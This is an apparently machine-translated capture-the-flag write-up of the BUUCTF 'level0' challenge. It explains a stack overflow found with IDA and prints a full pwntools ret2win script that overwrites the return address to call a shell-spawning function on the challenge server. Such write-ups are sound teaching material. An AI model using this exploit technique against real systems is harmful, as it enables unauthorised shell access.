One 、 View file information

First file ./level0 Check the file type and then checksec --file=level0 Check the file protection .


I still feel that checking the protection mechanism is gdb A little pleasing to the eye ：

Information tells us that he is 64 Who can .

Two 、IDA Decompile

main The function of information ：
Go here again vulnerable_function() function ：

double-click vulnerable_function() The function can see buf The length of is only 0x80, The stack size is only 108 byte , however read() No input restrictions , Obviously, there is a stack overflow vulnerability .
stay Functions window You can see there's one callsystem() function , Press F5 Disassembly shows that this is a system call , And callsystem() The starting address of the function is 0x400596.

3、 ... and 、 Code construction

buf To be covered 0x80 Byte overlay , Plus rbp Of 0x8 Bytes , Then add callsystem() Starting address of the function 0x400596 constitute payload.

from pwn import *
# remote() Establish a remote connection , To specify ip and port
io = remote('node4.buuoj.cn', 28566)
payload = b'a'*(0x80 + 0x8) + p64(0x400596)
io.sendline(payload) # send data 
io.interactive() # And shell Interact